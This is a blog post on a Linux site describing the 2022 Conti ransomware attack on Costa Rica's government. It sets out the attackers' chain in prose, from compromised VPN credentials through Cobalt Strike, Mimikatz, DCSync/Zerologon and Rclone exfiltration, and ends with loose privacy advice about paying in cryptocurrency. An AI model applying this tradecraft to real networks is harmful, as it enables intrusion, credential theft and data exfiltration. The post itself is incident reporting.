Why You Shouldn't Use Microsoft Windows11.

...

LMDE5 - Linux Mint Debian Edition.

LMDE5 -...

Why Should I Not Use Windows10?

Here are a...

Costa Rican Government Cyber-attack Revealed

English

Costa Rican Government Cyber-attack Revealed.

The attackers are known as "Conti" a ransomware group that can be found on the Dark Web, began their attack on April 11th, 2022.

Their entry was a compromised VPN-account, so don't share your login details and besides that make your passwords long and complicated.

Apparently the president of Costa Rica declared a state of emergency and claimed that traitors helped hackers during the attacks, whether this is true or not, always think security.

It only took three months for them to come clean about the breach, nice.

How they accessed the systems:

The group used a system of Costa Rica’s Ministry of Finance as the entry point. A member, named MemberX, gained access by using a VPN connection and compromised credentials. According to the report published by AdvIntel, in the early stages of the attack, the group set up over 10 Cobalt Strike beacons. The initial attack vector for this operation was compromised credential access via VPN.

According to the report, the group used the following methods:

  1. The infection followed a typical attack flow wherein the adversaries gained access from the compromised VPN log by installing a crypted form of Cobalt Strike inside the Costa Rica sub-network.
  2. The adversaries obtained local network domain administrator and enterprise administrator recon.
  3. The threat actors then performed network reconnaissance via Nltest domain trust enumeration, before scanning the network for file shares by leveraging the ShareFinder utility and AdFind from C:\ProgramData.
  4. The adversary (referenced by internal pseudonym “MemberX”) downloaded the fileshare output on their local machine via the Cobalt Strike channel.
  5. Then, the adversaries leveraged Cobalt Strike’s Mimikatz to dump logon passwords and NTDS hashes of the local machine users, obtaining plaintext and brute-forceable local admin, domain, and enterprise administrator hashes.
  6. The adversaries leveraged the enterprise user credentials to perform a DCSync and Zerologon attack. This effectively gained them access to every host on the Costa Rica interconnected networks.
  7. The adversaries then uploaded MSI scripts with Atera Remote Management Tool (RMM), the remote hosts selecting those with local admin access and less user activity. This established “anchoring” and safe return in case the threat actors’ beacons were burned or detected by the well-known EDR tool utilized by Costa Rica.
  8. The adversaries pinged the whole network and re-scanned the network domain trusts, leveraging enterprise administrator credentials with ShareFinder and compiling a list of all corporate assets and databases available under their new elevated privileges.
  9. On several network hosts, the adversaries also created a Rclone configuration file, which their data exfiltration tool leveraged as input with the MEGA Share uploader. They then began exfiltration from the network.
  10. The adversaries uploaded Process Hacker, Power Tools, and Do Not Sleep tools, and batch scripts filled in with the fileshare access locations.

This caused Rodrigo Chaves Robles, the President of Costa Rica to declare a state of national emergency due to cyber attack.

Free advice, don't use Windows:

Always use a long, very long and complicated password for everything from acessing your computer to a VPN and never use your own MasterCard or VISA.

All cash, zcash or Monero.

DO NOT USE:

DO not use anyone related to you, also no known friends. No phone, birthdate, date when they got pregnant or equal.

No social media: Not as yourself anyways.

If you use Linux: Setup Honeypots for your server or you website.

 

Help us by donating a small amount

 
If you find this site helpful, please consider donating a small amount.
Please use our contact us form and we will give you the relevant information to make a donation.
We accept BitCoin and ZCash at the moment.

Games For Linux

Windows has always been the preferred platform for gaming, but after STEAM's interest in Linux more game developers are making their games natively available for Linux.

Disclaimer

All information on this website is published in good faith and for general educational purposes and for use in safe testing environments only. While linuxexperten.com strives to make the information on this site as accurate as possible, linuxexperten.com does not warrant its completeness, reliability and accuracy.

We are not responsible for any losses or damages associated with the use of our website. While we strive to provide only links to useful websites, we have no control over the content of these sites and links to other sites do not constitute a recommendation for all content contained on these websites.

 

Site Information

This is a professional review site that receives compensation from the companies whose products reviewed. Each service or product are thoroughly tested and given high marks if considered to be the very best. Independently owned and the opinions expressed here are no one elses.

 

Limited Time Offers

NordVPN + 3 Months